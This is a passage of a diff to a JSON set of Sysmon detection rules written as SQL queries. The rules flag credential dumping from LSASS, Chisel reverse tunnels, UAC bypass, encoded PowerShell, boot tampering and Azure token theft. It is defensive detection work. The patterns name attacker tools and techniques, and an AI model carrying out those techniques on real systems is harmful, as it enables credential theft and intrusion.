"attack.g0044" ], "falsepositives": [ - "Unlikely, because no one should dump an lsass process memory", - "Another tool that uses the command line switches of Procdump" + "Legitimate setups that use similar flags" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '% -ma %' ESCAPE '\\' OR CommandLine LIKE '% /ma %' ESCAPE '\\') AND CommandLine LIKE '% ls%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 
'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%setup0.exe -p%' ESCAPE '\\' OR (CommandLine LIKE '%setup.exe%' ESCAPE '\\' AND (CommandLine LIKE '%-x:0' ESCAPE '\\' OR CommandLine LIKE '%-x:1' ESCAPE '\\' OR CommandLine LIKE '%-x:2' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_sysinternals_procdump_lsass.yml" + "filename": "proc_creation_win_apt_winnti_pipemon.yml" }, { - "title": "Execution via Diskshadow.exe", - "id": "0c2f8629-7129-4a8a-9897-7e0768f13ff2", - "status": "test", - "description": "Detects using Diskshadow.exe to execute arbitrary code in text file", - "author": "Ivan Dyachkov, oscd.community", + "title": "PUA - Chisel Tunneling Tool Execution", + "id": "8b0e12da-d3c3-49db-bb4f-256703f380e5", + "status": "experimental", + "description": "Detects usage of the Chisel tunneling tool via the commandline arguments", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1218" + "attack.command_and_control", + "attack.t1090.001" ], "falsepositives": [ - "False postitve can be if administrators use diskshadow tool in their infrastructure as a main backup tool with scripts." 
+ "Some false positives may occur with other tools with similar commandlines" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\diskshadow.exe' ESCAPE '\\' AND (CommandLine LIKE '%/s%' ESCAPE '\\' OR CommandLine LIKE '%-s%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\chisel.exe' ESCAPE '\\' OR ((CommandLine LIKE '%exe client %' ESCAPE '\\' OR CommandLine LIKE '%exe server %' ESCAPE '\\') AND (CommandLine LIKE '%-socks5%' ESCAPE '\\' OR CommandLine LIKE '%-reverse%' ESCAPE '\\' OR CommandLine LIKE '% r:%' ESCAPE '\\' OR CommandLine LIKE '%:127.0.0.1:%' ESCAPE '\\' OR CommandLine LIKE '%-tls-skip-verify %' ESCAPE '\\' OR CommandLine LIKE '%:socks%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_lolbin_diskshadow.yml" + "filename": "proc_creation_win_pua_chisel.yml" }, { - "title": "ZOHO Dctask64 Process Injection", - "id": "6345b048-8441-43a7-9bed-541133633d7a", - "status": "test", - "description": "Detects suspicious process injection using ZOHO's dctask64.exe", + "title": "Cmd.EXE Missing Space Characters Execution Anomaly", + "id": "a16980c2-0c56-4de0-9a79-17971979efdd", + "status": "experimental", + "description": "Detects Windows command lines that miss a space before or after the /c flag when running a command using the cmd.exe.\nThis could be a sign of obfuscation of a fat finger problem (typo by the developer).\n", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1055.001" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\dctask64.exe' ESCAPE '\\' AND NOT (CommandLine LIKE '%DesktopCentral\\_Agent\\\\agent%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE 
((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%cmd.exe/c%' ESCAPE '\\' OR CommandLine LIKE '%\\\\cmd/c%' ESCAPE '\\' OR CommandLine LIKE '%\"cmd/c%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe/k%' ESCAPE '\\' OR CommandLine LIKE '%\\\\cmd/k%' ESCAPE '\\' OR CommandLine LIKE '%\"cmd/k%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe/r%' ESCAPE '\\' OR CommandLine LIKE '%\\\\cmd/r%' ESCAPE '\\' OR CommandLine LIKE '%\"cmd/r%' ESCAPE '\\') OR (CommandLine LIKE '%/cwhoami%' ESCAPE '\\' OR CommandLine LIKE '%/cpowershell%' ESCAPE '\\' OR CommandLine LIKE '%/cschtasks%' ESCAPE '\\' OR CommandLine LIKE '%/cbitsadmin%' ESCAPE '\\' OR CommandLine LIKE '%/ccertutil%' ESCAPE '\\' OR CommandLine LIKE '%/kwhoami%' ESCAPE '\\' OR CommandLine LIKE '%/kpowershell%' ESCAPE '\\' OR CommandLine LIKE '%/kschtasks%' ESCAPE '\\' OR CommandLine LIKE '%/kbitsadmin%' ESCAPE '\\' OR CommandLine LIKE '%/kcertutil%' ESCAPE '\\') OR (CommandLine LIKE '%cmd.exe /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r%' ESCAPE '\\' OR CommandLine LIKE '%cmd /r%' ESCAPE '\\')) AND NOT (((CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\')) OR (CommandLine LIKE '%AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\resources\\\\app\\\\node\\_modules%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe/c .' 
ESCAPE '\\' OR CommandLine = 'cmd.exe /c')))" ], - "filename": "proc_creation_win_lolbin_dctask64_proc_inject.yml" + "filename": "proc_creation_win_cmd_no_space_execution.yml" }, { - "title": "UAC Bypass Using ChangePK and SLUI", - "id": "503d581c-7df0-4bbe-b9be-5840c0ecc1fc", + "title": "Bypass UAC via Fodhelper.exe", + "id": "7f741dcf-fc22-4759-87b4-9ae8376676a2", "status": "test", - "description": "Detects an UAC bypass that uses changepk.exe and slui.exe (UACMe 61)", - "author": "Christian Burkard (Nextron Systems)", + "description": "Identifies use of Fodhelper.exe to bypass User Account Control. Adversaries use this technique to execute privileged processes.", + "author": "E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community", "tags": [ - "attack.defense_evasion", "attack.privilege_escalation", "attack.t1548.002" ], "falsepositives": [ - "Unknown" + "Legitimate use of fodhelper.exe utility by legitimate user" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\changepk.exe' ESCAPE '\\' AND ParentImage LIKE '%\\\\slui.exe' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\fodhelper.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_uac_bypass_changepk_slui.yml" + "filename": "proc_creation_win_uac_bypass_fodhelper.yml" }, { - "title": "Potential Emotet Activity", - "id": "d02e8cf5-6099-48cf-9bfc-1eec2d0c7b18", - "status": "stable", - "description": "Detects all Emotet like process executions that are not covered by the more generic rules", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential Raspberry Robin Dot Ending File", + "id": "a35c97c8-d9c4-4c89-a3e7-533dc0bcb73a", + "status": "experimental", + "description": "Detects commandline containing reference to files ending with a \".\" This 
scheme has been seen used by raspberry-robin", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.defense_evasion", - "attack.t1027" + "attack.execution" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '% -e% PAA%' ESCAPE '\\' OR CommandLine LIKE '%JABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQ%' ESCAPE '\\' OR CommandLine LIKE '%QAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUA%' ESCAPE '\\' OR CommandLine LIKE '%kAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlA%' ESCAPE '\\' OR CommandLine LIKE '%IgAoACcAKgAnACkAOwAkA%' ESCAPE '\\' OR CommandLine LIKE '%IAKAAnACoAJwApADsAJA%' ESCAPE '\\' OR CommandLine LIKE '%iACgAJwAqACcAKQA7ACQA%' ESCAPE '\\' OR CommandLine LIKE '%JABGAGwAeAByAGgAYwBmAGQ%' ESCAPE '\\' OR CommandLine LIKE '%PQAkAGUAbgB2ADoAdABlAG0AcAArACgA%' ESCAPE '\\' OR CommandLine LIKE '%0AJABlAG4AdgA6AHQAZQBtAHAAKwAoA%' ESCAPE '\\' OR CommandLine LIKE '%9ACQAZQBuAHYAOgB0AGUAbQBwACsAKA%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%fAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgAgAC0ARQByAHIAbwByAEEAYwB0AGkAbwBuACAAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQ%' ESCAPE '\\' OR CommandLine LIKE '%wAIABDAG8AbgB2AGUAcgB0AFQAbwAtAEoAcwBvAG4AIAAtAEUAcgByAG8AcgBBAGMAdABpAG8AbgAgAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUA%' ESCAPE '\\' OR CommandLine LIKE '%8ACAAQwBvAG4AdgBlAHIAdABUAG8ALQBKAHMAbwBuACAALQBFAHIAcgBvAHIAQQBjAHQAaQBvAG4AIABTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlA%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine REGEXP '\\\\[a-zA-Z0-9]{1,32}\\.[a-zA-Z0-9]{1,6}\\.[ \"']{1}')" ], - "filename": "proc_creation_win_malware_emotet.yml" + "filename": "proc_creation_win_malware_raspberry_robin_single_dot_ending_file.yml" }, { - "title": "File Download Via Bitsadmin To A Suspicious Target 
Folder", - "id": "2ddef153-167b-4e89-86b6-757a9e65dcac", - "status": "experimental", - "description": "Detects usage of bitsadmin downloading a file to a suspicious target folder", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "title": "New DNS ServerLevelPluginDll Installed Via Dnscmd.EXE", + "id": "f63b56ee-3f79-4b8a-97fb-5c48007e8573", + "status": "test", + "description": "Detects the installation of a DNS plugin DLL via ServerLevelPluginDll parameter in registry, which can be used to execute code in context of the DNS server (restart required)", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.persistence", - "attack.t1197", - "attack.s0190", - "attack.t1036.003" + "attack.t1574.002", + "attack.t1112" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR OriginalFileName = 'bitsadmin.exe') AND (CommandLine LIKE '% /transfer %' ESCAPE '\\' OR CommandLine LIKE '% /create %' ESCAPE '\\' OR CommandLine LIKE '% /addfile %' ESCAPE '\\') AND (CommandLine LIKE '%\\%ProgramData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%public\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Perflogs%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\dnscmd.exe' ESCAPE '\\' AND CommandLine LIKE '%/config%' ESCAPE '\\' AND CommandLine LIKE '%/serverlevelplugindll%' ESCAPE '\\')" ], - "filename": "proc_creation_win_bitsadmin_download_susp_targetfolder.yml" + "filename": 
"proc_creation_win_dnscmd_install_new_server_level_plugin_dll.yml" }, { - "title": "Suspicious PrinterPorts Creation (CVE-2020-1048)", - "id": "cc08d590-8b90-413a-aff6-31d1a99678d7", + "title": "Invoke-Obfuscation Via Use Clip", + "id": "e1561947-b4e3-4a74-9bdd-83baed21bdb5", "status": "test", - "description": "Detects new commands that add new printer port which point to suspicious file", - "author": "EagleEye Team, Florian Roth", + "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.persistence", + "attack.defense_evasion", + "attack.t1027", "attack.execution", "attack.t1059.001" ], "falsepositives": [ - "New printer port install on host" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%Add-PrinterPort -Name%' ESCAPE '\\' AND (CommandLine LIKE '%.exe%' ESCAPE '\\' OR CommandLine LIKE '%.dll%' ESCAPE '\\' OR CommandLine LIKE '%.bat%' ESCAPE '\\')) OR CommandLine LIKE '%Generic / Text Only%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%echo%' ESCAPE '\\' AND CommandLine LIKE '%clip%' ESCAPE '\\' AND CommandLine LIKE '%&&%' ESCAPE '\\' AND (CommandLine LIKE '%clipboard%' ESCAPE '\\' OR CommandLine LIKE '%invoke%' ESCAPE '\\' OR CommandLine LIKE '%i`%' ESCAPE '\\' OR CommandLine LIKE '%n`%' ESCAPE '\\' OR CommandLine LIKE '%v`%' ESCAPE '\\' OR CommandLine LIKE '%o`%' ESCAPE '\\' OR CommandLine LIKE '%k`%' ESCAPE '\\' OR CommandLine LIKE '%e`%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_exploit_cve_2020_1048.yml" + "filename": "proc_creation_win_hktl_invoke_obfuscation_via_use_clip.yml" }, { - "title": "Potential Credential Dumping Via LSASS Process Clone", - "id": "c8da0dfd-4ed0-4b68-962d-13c9c884384e", - "status": "test", - "description": "Detects a suspicious LSASS 
process process clone that could be a sign of credential dumping activity", - "author": "Florian Roth (Nextron Systems), Samir Bousseaden", + "title": "Boot Configuration Tampering Via Bcdedit.EXE", + "id": "1444443e-6757-43e4-9ea4-c8fc705f79a2", + "status": "stable", + "description": "Detects the use of the bcdedit command to tamper with the boot configuration data. This technique is often times used by malware or attackers as a destructive way before launching ransomware.", + "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", "tags": [ - "attack.credential_access", - "attack.t1003", - "attack.t1003.001" + "attack.impact", + "attack.t1490" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\' AND ParentImage LIKE '%\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\bcdedit.exe' ESCAPE '\\' OR OriginalFileName = 'bcdedit.exe') AND CommandLine LIKE '%set%' ESCAPE '\\' AND ((CommandLine LIKE '%bootstatuspolicy%' ESCAPE '\\' AND CommandLine LIKE '%ignoreallfailures%' ESCAPE '\\') OR (CommandLine LIKE '%recoveryenabled%' ESCAPE '\\' AND CommandLine LIKE '%no%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_lsass_clone.yml" + "filename": "proc_creation_win_bcdedit_boot_conf_tamper.yml" }, { - "title": "Execution in Outlook Temp Folder", - "id": "a018fdc3-46a3-44e5-9afb-2cd4af1d4b39", + "title": "PUA - RunXCmd Execution", + "id": "93199800-b52a-4dec-b762-75212c196542", "status": "test", - "description": "Detects a suspicious program execution in Outlook temp folder", + "description": "Detects the use of the RunXCmd tool to execute commands with System or TrustedInstaller accounts", "author": 
"Florian Roth (Nextron Systems)", "tags": [ - "attack.initial_access", - "attack.t1566.001" + "attack.execution", + "attack.t1569.002", + "attack.s0029" ], "falsepositives": [ - "Unknown" + "Legitimate use by administrators" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\Temporary Internet Files\\\\Content.Outlook\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '% /account=system %' ESCAPE '\\' OR CommandLine LIKE '% /account=ti %' ESCAPE '\\') AND CommandLine LIKE '%/exec=%' ESCAPE '\\')" ], - "filename": "proc_creation_win_office_outlook_execution_from_temp.yml" + "filename": "proc_creation_win_pua_runxcmd.yml" }, { - "title": "Turla Group Commands May 2020", - "id": "9e2e51c5-c699-4794-ba5a-29f5da40ac0c", + "title": "Suspicious Kernel Dump Using Dtrace", + "id": "7124aebe-4cd7-4ccb-8df0-6d6b93c96795", "status": "test", - "description": "Detects commands used by Turla group as reported by ESET in May 2020", + "description": "Detects suspicious way to dump the kernel on Windows systems using dtrace.exe, which is available on Windows systems since Windows 10 19H1", "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.g0010", - "attack.execution", - "attack.t1059.001", - "attack.t1053.005", - "attack.t1027" - ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%tracert -h 10 yahoo.com%' ESCAPE '\\' OR CommandLine LIKE '%.WSqmCons))|iex;%' ESCAPE '\\' OR CommandLine LIKE '%Fr`omBa`se6`4Str`ing%' ESCAPE '\\') OR (CommandLine LIKE '%net use https://docs.live.net%' ESCAPE '\\' AND CommandLine LIKE '%@aol.co.uk%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 
'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\dtrace.exe' ESCAPE '\\' AND CommandLine LIKE '%lkd(0)%' ESCAPE '\\') OR (CommandLine LIKE '%syscall:::return%' ESCAPE '\\' AND CommandLine LIKE '%lkd(%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_apt_turla_comrat_may20.yml" + "filename": "proc_creation_win_dtrace_kernel_dump.yml" }, { - "title": "Format.com FileSystem LOLBIN", - "id": "9fb6b26e-7f9e-4517-a48b-8cac4a1b6c60", + "title": "Imports Registry Key From an ADS", + "id": "0b80ade5-6997-4b1d-99a1-71701778ea61", "status": "test", - "description": "Detects the execution of format.com with a suspicious filesystem selection that could indicate a defense evasion activity in which format.com is used to load malicious DLL files or other programs", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the import of a alternate datastream to the registry with regedit.exe.", + "author": "Oddvar Moe, Sander Wiebing, oscd.community", "tags": [ + "attack.t1112", "attack.defense_evasion" ], "falsepositives": [ 
@@ -10729,497 +10347,529 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\format.com' ESCAPE '\\' AND CommandLine LIKE '%/fs:%' ESCAPE '\\') AND NOT (((CommandLine LIKE '%/fs:FAT%' ESCAPE '\\' OR CommandLine LIKE '%/fs:exFAT%' ESCAPE '\\' OR CommandLine LIKE '%/fs:NTFS%' ESCAPE '\\' OR CommandLine LIKE '%/fs:UDF%' ESCAPE '\\' OR CommandLine LIKE '%/fs:ReFS%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\regedit.exe' ESCAPE '\\' OR OriginalFileName = 'REGEDIT.EXE') AND ((CommandLine LIKE '% /i %' ESCAPE '\\' OR CommandLine LIKE '%.reg%' ESCAPE '\\') AND CommandLine REGEXP ':[^ \\\\]')) AND NOT ((CommandLine LIKE '% /e %' ESCAPE '\\' OR CommandLine LIKE '% /a %' ESCAPE '\\' OR CommandLine LIKE '% /c %' ESCAPE '\\' OR CommandLine LIKE '% -e %' ESCAPE '\\' OR CommandLine LIKE '% -a %' ESCAPE '\\' OR CommandLine LIKE '% -c %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_format.yml" + "filename": "proc_creation_win_regedit_import_keys_ads.yml" }, { - "title": "Suspicious PowerShell Encoded Command Patterns", - "id": "b9d9cc83-380b-4ba3-8d8f-60c0e7e2930c", - "status": "experimental", - "description": "Detects PowerShell command line patterns in combincation with encoded commands that often appear in malware infection chains", + "title": "Suspicious Desktopimgdownldr Command", + "id": "bb58aa4a-b80b-415a-a2c0-2f65a4c81009", + "status": "test", + "description": "Detects a suspicious Microsoft desktopimgdownldr execution with parameters used to download files from the Internet", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Other tools that work with encoded scripts in the command line instead of script files" + "False positives depend on 
scripts and administrative tools used in the monitored environment" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.Exe', 'pwsh.dll')) AND (CommandLine LIKE '% -e %' ESCAPE '\\' OR CommandLine LIKE '% -en %' ESCAPE '\\' OR CommandLine LIKE '% -enc %' ESCAPE '\\' OR CommandLine LIKE '% -enco%' ESCAPE '\\') AND (CommandLine LIKE '% JAB%' ESCAPE '\\' OR CommandLine LIKE '% SUVYI%' ESCAPE '\\' OR CommandLine LIKE '% SQBFAFgA%' ESCAPE '\\' OR CommandLine LIKE '% aWV4I%' ESCAPE '\\' OR CommandLine LIKE '% IAB%' ESCAPE '\\' OR CommandLine LIKE '% PAA%' ESCAPE '\\' OR CommandLine LIKE '% aQBlAHgA%' ESCAPE '\\')) AND NOT (((ParentImage LIKE '%C:\\\\Packages\\\\Plugins\\\\Microsoft.GuestConfiguration.ConfigurationforWindows\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\gc\\_worker.exe%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '% /lockscreenurl:%' ESCAPE '\\' AND NOT ((CommandLine LIKE '%.jpg%' ESCAPE '\\' OR CommandLine LIKE '%.jpeg%' ESCAPE '\\' OR CommandLine LIKE '%.png%' ESCAPE '\\'))) OR (CommandLine LIKE '%reg delete%' ESCAPE '\\' AND CommandLine LIKE '%\\\\PersonalizationCSP%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_encoded_cmd_patterns.yml" + "filename": "proc_creation_win_desktopimgdownldr_susp_execution.yml" }, { - "title": "Rundll32 Execution Without Parameters", - "id": "5bb68627-3198-40ca-b458-49f973db8752", - "status": "test", - "description": "Detects rundll32 execution without parameters as observed when running Metasploit windows/smb/psexec exploit module", - "author": "Bartlomiej Czyz, Relativity", + "title": "TropicTrooper Campaign November 2018", + "id": "8c7090c3-e0a0-4944-bd08-08c3a0cecf79", + "status": "stable", + "description": 
"Detects TropicTrooper activity, an actor who targeted high-profile organizations in the energy and food and beverage sectors in Asia", + "author": "@41thexplorer, Microsoft Defender ATP", "tags": [ - "attack.lateral_movement", - "attack.t1021.002", - "attack.t1570", "attack.execution", - "attack.t1569.002" - ], - "falsepositives": [ - "False positives may occur if a user called rundll32 from CLI with no options" + "attack.t1059.001" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine IN ('rundll32.exe', 'rundll32'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%abCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCc%' ESCAPE '\\')" ], - "filename": "proc_creation_win_rundll32_without_parameters.yml" + "filename": "proc_creation_win_apt_tropictrooper.yml" }, { - "title": "Phishing Pattern ISO in Archive", - "id": "fcdf69e5-a3d3-452a-9724-26f2308bf2b1", + "title": "Microsoft IIS Connection Strings Decryption", + "id": "97dbf6e2-e436-44d8-abee-4261b24d3e41", "status": "experimental", - "description": "Detects cases in which an ISO files is opend within an archiver like 7Zip or Winrar, which is a sign of phishing as threat actors put small ISO files in archives as email attachments to bypass certain filters and protective measures (mark of web)", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects use of aspnet_regiis to decrypt Microsoft IIS connection strings. 
An attacker with Microsoft IIS web server access via a webshell or alike can decrypt and dump any hardcoded connection strings, such as the MSSQL service account password using aspnet_regiis command.", + "author": "Tim Rauch", "tags": [ - "attack.initial_access", - "attack.t1566" + "attack.credential_access", + "attack.t1003" ], "falsepositives": [ - "Legitimate cases in which archives contain ISO or IMG files and the user opens the archive and the image via clicking and not extraction" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (ParentImage LIKE '%\\\\Winrar.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\7zFM.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\peazip.exe' ESCAPE '\\') AND (Image LIKE '%\\\\isoburn.exe' ESCAPE '\\' OR Image LIKE '%\\\\PowerISO.exe' ESCAPE '\\' OR Image LIKE '%\\\\ImgBurn.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\aspnet\\_regiis.exe' ESCAPE '\\' OR OriginalFileName LIKE 'aspnet\\_regiis.exe' ESCAPE '\\') AND (CommandLine LIKE '%connectionStrings%' ESCAPE '\\' AND CommandLine LIKE '% -pdf%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_archiver_iso_phishing.yml" + "filename": "proc_creation_win_iis_connection_strings_decryption.yml" }, { - "title": "Serv-U Exploitation CVE-2021-35211 by DEV-0322", - "id": "75578840-9526-4b2a-9462-af469a45e767", - "status": "test", - "description": "Detects patterns as noticed in exploitation of Serv-U CVE-2021-35211 vulnerability by threat group DEV-0322", - "author": "Florian Roth (Nextron Systems)", + "title": "Renamed BrowserCore.EXE Execution", + "id": "8a4519e8-e64a-40b6-ae85-ba8ad2177559", + "status": "experimental", + "description": "Detects process creation with a renamed BrowserCore.exe (used to extract Azure tokens)", + "author": "Max Altgelt (Nextron Systems)", "tags": [ - "attack.persistence", - 
"attack.t1136.001", - "cve.2021.35211" + "attack.t1528", + "attack.t1036.003" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND CommandLine LIKE '%whoami%' ESCAPE '\\' AND ((CommandLine LIKE '%./Client/Common/%' ESCAPE '\\' OR CommandLine LIKE '%.\\\\Client\\\\Common\\\\%' ESCAPE '\\') OR CommandLine LIKE '%C:\\\\Windows\\\\Temp\\\\Serv-U.bat%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND OriginalFileName = 'BrowserCore.exe' AND NOT ((Image LIKE '%\\\\BrowserCore.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_exploit_cve_2021_35211_servu.yml" + "filename": "proc_creation_win_renamed_browsercore.yml" }, { - "title": "HackTool - Hashcat Password Cracker Execution", - "id": "39b31e81-5f5f-4898-9c0e-2160cfc0f9bf", + "title": "WhoAmI as Parameter", + "id": "e9142d84-fbe0-401d-ac50-3e519fb00c89", "status": "test", - "description": "Execute Hashcat.exe with provided SAM file from registry of Windows and Password list to crack against", - "author": "frack113", + "description": "Detects a suspicious process command line that uses whoami as first parameter (as e.g. 
